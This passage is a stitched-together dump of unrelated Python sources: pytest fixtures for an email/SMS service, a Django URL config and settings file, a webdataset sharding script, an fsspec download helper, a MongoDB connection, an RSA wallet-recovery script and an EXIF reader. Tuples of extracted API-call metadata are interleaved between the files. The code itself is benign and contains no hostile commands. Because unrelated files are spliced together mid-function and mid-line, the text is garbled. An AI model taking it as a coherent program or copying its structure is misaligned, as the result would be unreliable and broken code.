            return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
    return _send_message
@pytest.fixture
def send_sms(cli, worker):
    """Return a coroutine that POSTs an SMS send request, runs the worker and
    returns the message's external id (``<uid>-<normalised number>``)."""
    async def _send_message(**extra):
        data = dict(
            uid=str(uuid.uuid4()),
            main_template='this is a test {{ variable }}',
            company_code='foobar',
            from_name='FooBar',
            method='sms-test',
            context={'variable': 'apples'},
            recipients=[{'number': '07896541236'}],
        )
        # assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
        data.update(**extra)
        r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
        assert r.status == 201
        await worker.run_check()
        return data['uid'] + '-447896541236'
    return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
    """Build the arq worker context dict; close its http clients on teardown."""
    ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
    await worker_startup(ctx)
    yield ctx
    await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
    """Yield a burst-mode arq Worker bound to the test app's redis pool."""
    worker = Worker(
        functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
    )
    yield worker
    await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
    """Return a coroutine that inserts a message_groups row for an email send
    and returns ``(group_id, company_id, model)``."""
    async def run(**kwargs):
        base_kwargs = dict(
            uid=str(uuid.uuid4()),
            subject_template='hello',
            company_code='test',
            from_address='<EMAIL>',
            method=SendMethod.email_mandrill,
            recipients=[],
        )
        # kwargs override the defaults above before model validation
        m = EmailSendModel(**dict(base_kwargs, **kwargs))
        company_id = await get_create_company_id(db_conn, m.company_code)
        group_id = await db_conn.fetchval_b(
            'insert into message_groups (:values__names) values :values returning id',
            values=Values(
                uuid=m.uid,
                company_id=company_id,
                message_method=m.method.value,
                from_email=m.from_address.email,
                from_name=m.from_address.name,
            ),
        )
        return group_id, company_id, m
    return run
| [
"morpheus.app.worker.startup",
"aioredis.create_redis",
"atoolbox.db.helpers.DummyPgPool",
"asyncio.new_event_loop",
"morpheus.app.settings.Settings",
"uuid.uuid4",
"arq.Worker",
"aiohttp.test_utils.teardown_test_loop",
"buildpg.Values",
"morpheus.app.main.create_app",
"atoolbox.test_utils.creat... | [((896, 944), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""', 'name': '"""clean_db"""'}), "(scope='session', name='clean_db')\n", (910, 944), False, 'import pytest\n'), ((1241, 1271), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""db_conn"""'}), "(name='db_conn')\n", (1255, 1271), False, 'import pytest\n'), ((1903, 1938), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""dummy_server"""'}), "(name='dummy_server')\n", (1917, 1938), False, 'import pytest\n'), ((2809, 2835), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""cli"""'}), "(name='cli')\n", (2823, 2835), False, 'import pytest\n'), ((5024, 5063), 'pytest.yield_fixture', 'pytest.yield_fixture', ([], {'name': '"""worker_ctx"""'}), "(name='worker_ctx')\n", (5044, 5063), False, 'import pytest\n'), ((5320, 5355), 'pytest.yield_fixture', 'pytest.yield_fixture', ([], {'name': '"""worker"""'}), "(name='worker')\n", (5340, 5355), False, 'import pytest\n'), ((5585, 5624), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""call_send_emails"""'}), "(name='call_send_emails')\n", (5599, 5624), False, 'import pytest\n'), ((1049, 1072), 'morpheus.app.settings.Settings', 'Settings', ([], {}), '(**pg_settings)\n', (1057, 1072), False, 'from morpheus.app.settings import Settings\n'), ((1084, 1108), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (1106, 1108), False, 'import asyncio\n'), ((1213, 1237), 'aiohttp.test_utils.teardown_test_loop', 'teardown_test_loop', (['loop'], {}), '(loop)\n', (1231, 1237), False, 'from aiohttp.test_utils import teardown_test_loop\n'), ((3001, 3030), 'morpheus.app.main.create_app', 'create_app', ([], {'settings': 'settings'}), '(settings=settings)\n', (3011, 3030), False, 'from morpheus.app.main import create_app\n'), ((5409, 5528), 'arq.Worker', 'Worker', ([], {'functions': 'worker_functions', 'redis_pool': "cli.server.app['redis']", 'burst': '(True)', 'poll_delay': '(0.01)', 'ctx': 'worker_ctx'}), 
"(functions=worker_functions, redis_pool=cli.server.app['redis'],\n burst=True, poll_delay=0.01, ctx=worker_ctx)\n", (5415, 5528), False, 'from arq import ArqRedis, Worker\n'), ((1339, 1388), 'buildpg.asyncpg.connect_b', 'asyncpg.connect_b', ([], {'dsn': 'settings.pg_dsn', 'loop': 'loop'}), '(dsn=settings.pg_dsn, loop=loop)\n', (1356, 1388), False, 'from buildpg import Values, asyncpg\n'), ((1708, 1811), 'aioredis.create_redis', 'create_redis', (['addr'], {'db': 'settings.redis_settings.database', 'encoding': '"""utf8"""', 'commands_factory': 'ArqRedis'}), "(addr, db=settings.redis_settings.database, encoding='utf8',\n commands_factory=ArqRedis)\n", (1720, 1811), False, 'from aioredis import create_redis\n'), ((2040, 2132), 'atoolbox.test_utils.create_dummy_server', 'create_dummy_server', (['aiohttp_server'], {'extra_routes': 'dummy_server.routes', 'extra_context': 'ctx'}), '(aiohttp_server, extra_routes=dummy_server.routes,\n extra_context=ctx)\n', (2059, 2132), False, 'from atoolbox.test_utils import DummyServer, create_dummy_server\n'), ((5179, 5198), 'morpheus.app.worker.startup', 'worker_startup', (['ctx'], {}), '(ctx)\n', (5193, 5198), True, 'from morpheus.app.worker import startup as worker_startup, worker_functions\n'), ((3049, 3069), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (3060, 3069), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((4158, 4244), 're.sub', 're.sub', (['"""[^a-zA-Z0-9\\\\-]"""', '""""""', 'f"""{data[\'uid\']}-{data[\'recipients\'][0][\'address\']}"""'], {}), '(\'[^a-zA-Z0-9\\\\-]\', \'\',\n f"{data[\'uid\']}-{data[\'recipients\'][0][\'address\']}")\n', (4164, 4244), False, 'import re\n'), ((5147, 5167), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (5158, 5167), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((6028, 6074), 'morpheus.app.views.get_create_company_id', 'get_create_company_id', (['db_conn', 'm.company_code'], {}), '(db_conn, 
m.company_code)\n', (6049, 6074), False, 'from morpheus.app.views import get_create_company_id\n'), ((2968, 2988), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (2979, 2988), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((3414, 3426), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3424, 3426), False, 'import uuid\n'), ((4391, 4403), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4401, 4403), False, 'import uuid\n'), ((5738, 5750), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5748, 5750), False, 'import uuid\n'), ((6226, 6366), 'buildpg.Values', 'Values', ([], {'uuid': 'm.uid', 'company_id': 'company_id', 'message_method': 'm.method.value', 'from_email': 'm.from_address.email', 'from_name': 'm.from_address.name'}), '(uuid=m.uid, company_id=company_id, message_method=m.method.value,\n from_email=m.from_address.email, from_name=m.from_address.name)\n', (6232, 6366), False, 'from buildpg import Values, asyncpg\n')] |
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import View
# Root URL routing: the client and app apps under their own prefixes, the
# stock django auth views and python-social-auth at the root, plus the admin.
urlpatterns = [
    url(r'^client/', include('client.urls', namespace = 'client', app_name = 'client')),
    url(r'^app/', include('app.urls', namespace = 'app', app_name = 'app')),
    url('', include('django.contrib.auth.urls', namespace='auth')),
    url('', include('social.apps.django_app.urls', namespace='social')),
    url(r'^admin/', include(admin.site.urls)),
]
"django.conf.urls.include"
] | [((149, 210), 'django.conf.urls.include', 'include', (['"""client.urls"""'], {'namespace': '"""client"""', 'app_name': '"""client"""'}), "('client.urls', namespace='client', app_name='client')\n", (156, 210), False, 'from django.conf.urls import include, url\n'), ((233, 285), 'django.conf.urls.include', 'include', (['"""app.urls"""'], {'namespace': '"""app"""', 'app_name': '"""app"""'}), "('app.urls', namespace='app', app_name='app')\n", (240, 285), False, 'from django.conf.urls import include, url\n'), ((304, 357), 'django.conf.urls.include', 'include', (['"""django.contrib.auth.urls"""'], {'namespace': '"""auth"""'}), "('django.contrib.auth.urls', namespace='auth')\n", (311, 357), False, 'from django.conf.urls import include, url\n'), ((370, 428), 'django.conf.urls.include', 'include', (['"""social.apps.django_app.urls"""'], {'namespace': '"""social"""'}), "('social.apps.django_app.urls', namespace='social')\n", (377, 428), False, 'from django.conf.urls import include, url\n'), ((449, 473), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (456, 473), False, 'from django.conf.urls import include, url\n')] |
"""
imutils/big/make_shards.py
Generate one or more webdataset-compatible tar archive shards from an image classification dataset.
Based on script: https://github.com/tmbdev-archive/webdataset-examples/blob/7f56e9a8b978254c06aa0a98572a1331968b0eb3/makeshards.py
Added on: Sunday March 6th, 2022
Example usage:
python "/media/data/jacob/GitHub/image-utils/imutils/big/make_shards.py" \
--subsets=train,val,test \
--maxsize='1e9' \
--maxcount=50000 \
--shard_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset" \
--catalog_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog" \
--debug
"""
import sys
import os
import os.path
import random
import argparse
from torchvision import datasets
import webdataset as wds
import numpy as np
import os
from typing import Optional, Tuple, Any, Dict
from tqdm import trange, tqdm
import tarfile
tarfile.DEFAULT_FORMAT = tarfile.GNU_FORMAT
import webdataset as wds
# from imutils.big.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
def read_file_binary(fname):
    """Return the raw bytes of the file at ``fname``."""
    with open(fname, "rb") as fp:
        contents = fp.read()
    return contents
# Registry of catalog numbers already emitted, used to guarantee that every
# sample key is unique across the whole run.
all_keys = set()
def prepare_sample(dataset, index, subset: str="train", filekey: bool=False) -> Dict[str, Any]:
    """Build one webdataset sample dict for ``dataset[index]``.

    The key is the catalog number when ``filekey`` is set, otherwise the
    zero-padded index. Labels are attached for every subset except "test".
    """
    image_binary, label, metadata = dataset[index]
    catalog_number = metadata["catalog_number"]
    # each catalog number may appear at most once per run
    assert catalog_number not in all_keys
    all_keys.add(catalog_number)
    if filekey:
        sample_key = catalog_number
    else:
        sample_key = "%07d" % index
    sample = {"__key__": sample_key, "image.jpg": image_binary}
    if subset != "test":
        # sanity check against the dataset's own label list, then attach it
        assert label == dataset.targets[index]
        sample["label.cls"] = int(label)
    return sample
def write_dataset(catalog_dir: Optional[str]=None,
                  shard_dir: Optional[str]=None,
                  subset="train",
                  maxsize=1e9,
                  maxcount=100000,
                  limit_num_samples: Optional[int]=np.inf,
                  filekey: bool=False,
                  dataset=None):
    """Write one data subset as a sequence of webdataset tar shards.

    :param catalog_dir: directory with the csv catalogs (used if ``dataset`` is None)
    :param shard_dir: output directory for the ``.tar`` shards (created if missing)
    :param subset: one of "train"/"val"/"test"
    :param maxsize: maximum shard size in bytes
    :param maxcount: maximum number of samples per shard
    :param limit_num_samples: optional cap on samples written (used for --debug)
    :param filekey: use the catalog number instead of the index as sample key
    :param dataset: pre-built dataset, overriding construction from the catalog
    :returns: ``(dataset, indices)`` - the dataset used and the written indices
    """
    if dataset is None:
        # build the dataset from the csv catalog; read raw jpeg bytes and skip
        # all transforms so samples can be stored verbatim
        datamodule = Herbarium2022DataModule(catalog_dir=catalog_dir,
                                                num_workers=4,
                                                image_reader=read_file_binary,
                                                remove_transforms=True)
        datamodule.setup()
        dataset = datamodule.get_dataset(subset=subset)
    num_samples = len(dataset)
    print(f"With subset={subset}, Total num_samples: {num_samples}")
    if limit_num_samples < num_samples:
        num_samples = limit_num_samples
        print(f"Limiting this run to num_samples: {num_samples}")
    indices = list(range(num_samples))
    os.makedirs(shard_dir, exist_ok=True)
    pattern = os.path.join(shard_dir, f"herbarium_2022-{subset}-%06d.tar")
    with wds.ShardWriter(pattern, maxsize=maxsize, maxcount=maxcount) as sink:
        for i in tqdm(indices, desc=f"idx(Total={num_samples})"):
            sample = prepare_sample(dataset, index=i, subset=subset, filekey=filekey)
            sink.write(sample)
    return dataset, indices
def parse_args() -> argparse.Namespace:
    """Collect and parse the command line options for shard generation."""
    cli = argparse.ArgumentParser("""Generate sharded dataset from supervised image dataset.""")
    cli.add_argument("--subsets", default="train,val,test", help="which subsets to write")
    cli.add_argument("--filekey", action="store_true", help="use file as key (default: index)")
    # shard limits: bytes per shard and samples per shard
    cli.add_argument("--maxsize", type=float, default=1e9)
    cli.add_argument("--maxcount", type=float, default=100000)
    cli.add_argument(
        "--shard_dir",
        default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset",
        help="directory where shards are written",
    )
    cli.add_argument(
        "--catalog_dir",
        default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog",
        help="directory containing csv versions of the original train & test metadata json files from herbarium 2022",
    )
    cli.add_argument(
        "--debug",
        action="store_true",
        default=False,
        help="Provide this boolean flag to produce a debugging shard dataset of only a maximum of 200 samples per data subset. [TODO] Switch to temp directories when this flag is passed.",
    )
    return cli.parse_args()
def main(args):
    """Validate the shard limits, then write shards for every requested subset.

    :param args: parsed CLI namespace (see ``parse_args``); uses ``maxsize``,
        ``maxcount``, ``debug``, ``subsets``, ``catalog_dir``, ``shard_dir``
        and ``filekey``.
    """
    # args = parse_args()
    assert args.maxsize > 10000000 # Shards must be a minimum of 10+ MB
    assert args.maxcount < 1000000 # Shards must contain a maximum of 1,000,000 samples each
    # debug mode caps every subset at 200 samples
    limit_num_samples = 200 if args.debug else np.inf
    # if not os.path.isdir(os.path.join(args.data, "train")):
    #    print(f"{args.data}: should be directory containing ImageNet", file=sys.stderr)
    #    print(f"suitable as argument for torchvision.datasets.ImageNet(...)", file=sys.stderr)
    #    sys.exit(1)
    # if not os.path.isdir(os.path.join(args.shards, ".")):
    #    print(f"{args.shards}: should be a writable destination directory for shards", file=sys.stderr)
    #    sys.exit(1)
    subsets = args.subsets.split(",")
    for subset in tqdm(subsets, leave=True, desc=f"Processing {len(subsets)} subsets"):
        # print("# subset", subset)
        dataset, indices = write_dataset(catalog_dir=args.catalog_dir,
                                        shard_dir=args.shard_dir,
                                        subset=subset,
                                        maxsize=args.maxsize,
                                        maxcount=args.maxcount,
                                        limit_num_samples=limit_num_samples,
                                        filekey=args.filekey)
# NOTE(review): CATALOG_DIR is not referenced below - presumably kept for
# interactive use; the effective path comes from the --catalog_dir CLI option.
CATALOG_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog"
# SHARD_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset"
if __name__ == "__main__":
    args = parse_args()
    main(args)
    # summarize how many shard files were written per subset (matched by
    # the subset name appearing anywhere in the filename)
    written_files = os.listdir(args.shard_dir)
    files_per_subset = {"train":[],
                        "val":[],
                        "test":[]}
    for subset,v in files_per_subset.items():
        files_per_subset[subset] = len([f for f in written_files if subset in f])
    from rich import print as pp
    print(f"SUCCESS! TARGET SHARD DIR CONTAINS THE FOLLOWING:")
    pp(files_per_subset)
| [
"os.listdir",
"argparse.ArgumentParser",
"os.makedirs",
"imutils.ml.data.datamodule.Herbarium2022DataModule",
"tqdm.tqdm",
"os.path.join",
"rich.print",
"webdataset.ShardWriter"
] | [((2524, 2561), 'os.makedirs', 'os.makedirs', (['shard_dir'], {'exist_ok': '(True)'}), '(shard_dir, exist_ok=True)\n', (2535, 2561), False, 'import os\n'), ((2573, 2633), 'os.path.join', 'os.path.join', (['shard_dir', 'f"""herbarium_2022-{subset}-%06d.tar"""'], {}), "(shard_dir, f'herbarium_2022-{subset}-%06d.tar')\n", (2585, 2633), False, 'import os\n'), ((2954, 3041), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Generate sharded dataset from supervised image dataset."""'], {}), "(\n 'Generate sharded dataset from supervised image dataset.')\n", (2977, 3041), False, 'import argparse\n'), ((5479, 5505), 'os.listdir', 'os.listdir', (['args.shard_dir'], {}), '(args.shard_dir)\n', (5489, 5505), False, 'import os\n'), ((5792, 5812), 'rich.print', 'pp', (['files_per_subset'], {}), '(files_per_subset)\n', (5794, 5812), True, 'from rich import print as pp\n'), ((2031, 2153), 'imutils.ml.data.datamodule.Herbarium2022DataModule', 'Herbarium2022DataModule', ([], {'catalog_dir': 'catalog_dir', 'num_workers': '(4)', 'image_reader': 'read_file_binary', 'remove_transforms': '(True)'}), '(catalog_dir=catalog_dir, num_workers=4,\n image_reader=read_file_binary, remove_transforms=True)\n', (2054, 2153), False, 'from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset\n'), ((2641, 2701), 'webdataset.ShardWriter', 'wds.ShardWriter', (['pattern'], {'maxsize': 'maxsize', 'maxcount': 'maxcount'}), '(pattern, maxsize=maxsize, maxcount=maxcount)\n', (2656, 2701), True, 'import webdataset as wds\n'), ((2722, 2769), 'tqdm.tqdm', 'tqdm', (['indices'], {'desc': 'f"""idx(Total={num_samples})"""'}), "(indices, desc=f'idx(Total={num_samples})')\n", (2726, 2769), False, 'from tqdm import trange, tqdm\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import os
from io import BytesIO
from typing import List, Optional, Union
from fsspec.implementations.cached import WholeFileCacheFileSystem
from fsspec.implementations.http import HTTPFileSystem
from wetterdienst.util.cache import (
FSSPEC_CLIENT_KWARGS,
WD_CACHE_DISABLE,
CacheExpiry,
cache_dir,
)
class NetworkFilesystemManager:
    """
    Cache one fsspec filesystem instance per cache-expiration setting.
    """

    filesystems = {}

    @staticmethod
    def resolve_ttl(ttl: Union[int, CacheExpiry]):
        """Normalize *ttl* into a (name, value) pair usable as a cache key."""
        if isinstance(ttl, CacheExpiry):
            return ttl.name, ttl.value
        return ttl, ttl

    @classmethod
    def register(cls, ttl=CacheExpiry.NO_CACHE):
        """Create and store the filesystem instance keyed by *ttl*."""
        name, expiry = cls.resolve_ttl(ttl)
        key = f"ttl-{name}"
        storage_dir = os.path.join(cache_dir, "fsspec", key)
        plain_fs = HTTPFileSystem(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)
        if WD_CACHE_DISABLE or ttl is CacheExpiry.NO_CACHE:
            # Caching disabled: serve the raw HTTP filesystem directly.
            cls.filesystems[key] = plain_fs
        else:
            cls.filesystems[key] = WholeFileCacheFileSystem(
                fs=plain_fs, cache_storage=storage_dir, expiry_time=expiry
            )

    @classmethod
    def get(cls, ttl=CacheExpiry.NO_CACHE):
        """Return the filesystem for *ttl*, registering it on first use."""
        name, _ = cls.resolve_ttl(ttl)
        key = f"ttl-{name}"
        if key not in cls.filesystems:
            cls.register(ttl=ttl)
        return cls.filesystems[key]
def list_remote_files_fsspec(url: str, ttl: CacheExpiry = CacheExpiry.FILEINDEX) -> List[str]:
    """
    Create a listing of all files of a given path on the server.

    The default ttl with ``CacheExpiry.FILEINDEX`` is "5 minutes".

    :param url: The URL which should be searched for files.
    :param ttl: The cache expiration time.
    :returns: A list of strings representing the files from the path.
    """
    # When the cache is globally disabled the expiry evaluates to False,
    # which turns the listings cache off.
    listing_options = {
        "use_listings_cache": True,
        "listings_expiry_time": not WD_CACHE_DISABLE and ttl.value,
        "listings_cache_type": "filedircache",
        "listings_cache_location": cache_dir,
    }
    remote_fs = HTTPFileSystem(**listing_options)
    return remote_fs.find(url)
def download_file(url: str, ttl: Union[int, CacheExpiry] = CacheExpiry.NO_CACHE) -> BytesIO:
    """
    A function used to download a specified file from the server.
    :param url: The url to the file on the dwd server
    :param ttl: How long the resource should be cached (int seconds or a
        ``CacheExpiry`` member; passed through to the filesystem manager).
    :returns: Bytes of the file.
    """
    # Reuse (or lazily create) the filesystem registered for this TTL.
    filesystem = NetworkFilesystemManager.get(ttl=ttl)
    payload = filesystem.cat(url)
    return BytesIO(payload)
| [
"os.path.join",
"fsspec.implementations.cached.WholeFileCacheFileSystem",
"fsspec.implementations.http.HTTPFileSystem",
"io.BytesIO"
] | [((2241, 2416), 'fsspec.implementations.http.HTTPFileSystem', 'HTTPFileSystem', ([], {'use_listings_cache': '(True)', 'listings_expiry_time': '(not WD_CACHE_DISABLE and ttl.value)', 'listings_cache_type': '"""filedircache"""', 'listings_cache_location': 'cache_dir'}), "(use_listings_cache=True, listings_expiry_time=not\n WD_CACHE_DISABLE and ttl.value, listings_cache_type='filedircache',\n listings_cache_location=cache_dir)\n", (2255, 2416), False, 'from fsspec.implementations.http import HTTPFileSystem\n'), ((2900, 2916), 'io.BytesIO', 'BytesIO', (['payload'], {}), '(payload)\n', (2907, 2916), False, 'from io import BytesIO\n'), ((1041, 1079), 'os.path.join', 'os.path.join', (['cache_dir', '"""fsspec"""', 'key'], {}), "(cache_dir, 'fsspec', key)\n", (1053, 1079), False, 'import os\n'), ((1106, 1181), 'fsspec.implementations.http.HTTPFileSystem', 'HTTPFileSystem', ([], {'use_listings_cache': '(True)', 'client_kwargs': 'FSSPEC_CLIENT_KWARGS'}), '(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)\n', (1120, 1181), False, 'from fsspec.implementations.http import HTTPFileSystem\n'), ((1342, 1443), 'fsspec.implementations.cached.WholeFileCacheFileSystem', 'WholeFileCacheFileSystem', ([], {'fs': 'filesystem_real', 'cache_storage': 'real_cache_dir', 'expiry_time': 'ttl_value'}), '(fs=filesystem_real, cache_storage=real_cache_dir,\n expiry_time=ttl_value)\n', (1366, 1443), False, 'from fsspec.implementations.cached import WholeFileCacheFileSystem\n')] |
from pymongo import MongoClient
from bson import ObjectId
from bson.json_util import dumps
from json import loads
# Module-level MongoDB connection shared by the rest of this module.
client = MongoClient('localhost', 27017)
IOT_DB = client.iot_db
# Collections: one for device schemas, one for the device readings.
IOT_SCHEMAS = IOT_DB.iot_schemas
IOT_DATA = IOT_DB.iot_data
"pymongo.MongoClient"
] | [((124, 155), 'pymongo.MongoClient', 'MongoClient', (['"""localhost"""', '(27017)'], {}), "('localhost', 27017)\n", (135, 155), False, 'from pymongo import MongoClient\n')] |
# -*- coding: utf-8 -*-
"""
Django settings for demo project.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.urlresolvers import reverse_lazy
# Absolute path of the project root (two directories above this file).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__SHHH_ITS_A_SECRET__'
ALLOWED_HOSTS = []
ADMINS = []
MANAGERS = []
INTERNAL_IPS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.humanize',
    # To make it look nice
    'bootstrap3',
    # Boilerplate
    'boilerplate',
    # Apps
    'account',
    'store',
)
MIDDLEWARE = (
    'django.middleware.common.BrokenLinkEmailsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'demo.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'templates/'),
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.core.context_processors.media',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
TEMPLATE_LOADERS = [
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader'
]
LOCALE_PATHS = [
    os.path.join(BASE_DIR, 'locale'),
]
WSGI_APPLICATION = 'demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# SQLite file in the project root -- development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Outgoing mail is printed to the console instead of being sent.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = reverse_lazy('account:login')
| [
"os.path.abspath",
"os.path.join",
"django.core.urlresolvers.reverse_lazy"
] | [((3107, 3139), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""media/"""'], {}), "(BASE_DIR, 'media/')\n", (3119, 3139), False, 'import os\n'), ((3155, 3188), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""static/"""'], {}), "(BASE_DIR, 'static/')\n", (3167, 3188), False, 'import os\n'), ((3250, 3279), 'django.core.urlresolvers.reverse_lazy', 'reverse_lazy', (['"""account:login"""'], {}), "('account:login')\n", (3262, 3279), False, 'from django.core.urlresolvers import reverse_lazy\n'), ((2547, 2579), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""locale"""'], {}), "(BASE_DIR, 'locale')\n", (2559, 2579), False, 'import os\n'), ((443, 468), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (458, 468), False, 'import os\n'), ((2799, 2835), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (2811, 2835), False, 'import os\n'), ((1920, 1956), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""templates/"""'], {}), "(BASE_DIR, 'templates/')\n", (1932, 1956), False, 'import os\n')] |
from Cryptodome.PublicKey import RSA
import hashlib
import json
def recover(key):
    """Rebuild a wallet file from an RSA key pair.

    Writes the key material and the derived address to
    ``wallet_recovered.der`` and returns ``(address, filename)``.
    """
    priv_pem = key.exportKey().decode("utf-8")
    pub_pem = key.publickey().exportKey().decode("utf-8")
    # The wallet address is the SHA-224 digest of the public key text.
    addr = hashlib.sha224(pub_pem.encode("utf-8")).hexdigest()
    wallet = {
        'Private Key': priv_pem,
        'Public Key': pub_pem,
        'Address': addr,
    }
    with open("wallet_recovered.der", 'w') as wallet_file:
        json.dump(wallet, wallet_file)
    print ("Wallet recovered to: wallet_recovered.der")
    return (addr, "wallet_recovered.der")
# Edit with your pem file
# Read the PEM-encoded private key from disk and rebuild the wallet file.
with open('privkey.pem', 'r') as f:
    private_key_readable = f.read()
key = RSA.importKey(private_key_readable)
recover(key)
| [
"Cryptodome.PublicKey.RSA.importKey",
"json.dump"
] | [((769, 804), 'Cryptodome.PublicKey.RSA.importKey', 'RSA.importKey', (['private_key_readable'], {}), '(private_key_readable)\n', (782, 804), False, 'from Cryptodome.PublicKey import RSA\n'), ((525, 560), 'json.dump', 'json.dump', (['wallet_dict', 'wallet_file'], {}), '(wallet_dict, wallet_file)\n', (534, 560), False, 'import json\n')] |
'''
Stolen straight from https://stackoverflow.com/a/51337247/1224827
'''
try:
import PIL
import PIL.Image as PILimage
from PIL import ImageDraw, ImageFont, ImageEnhance
from PIL.ExifTags import TAGS, GPSTAGS
import os
import glob
except ImportError as err:
exit(err)
class Worker(object):
    """Extract EXIF metadata (notably the DateTime tag) from a PIL image."""

    def __init__(self, img):
        self.img = img
        self.get_exif_data()
        self.date = self.get_date_time()
        super(Worker, self).__init__()

    def get_exif_data(self):
        """Decode raw EXIF tag ids into a name-keyed dict stored on self.exif_data."""
        decoded_tags = {}
        raw = self.img._getexif()
        if raw:
            for tag_id, raw_value in raw.items():
                name = TAGS.get(tag_id, tag_id)
                if name == "GPSInfo":
                    # GPSInfo is itself a nested tag table; decode its keys too.
                    decoded_tags[name] = {
                        GPSTAGS.get(gps_id, gps_id): raw_value[gps_id]
                        for gps_id in raw_value
                    }
                else:
                    decoded_tags[name] = raw_value
        self.exif_data = decoded_tags

    def get_date_time(self):
        """Return the 'DateTime' EXIF value, or None when the tag is absent."""
        if 'DateTime' in self.exif_data:
            return self.exif_data['DateTime']
def main():
    # NOTE(review): relies on the module-global `image`, which is only
    # assigned inside the __main__ loop below -- calling main() outside
    # that context raises NameError.
    date = image.date
    print(date)
if __name__ == '__main__':
    # Scan every *.jpg under ./input and print its EXIF DateTime value.
    input_directory = os.path.join(os.getcwd(), 'input')
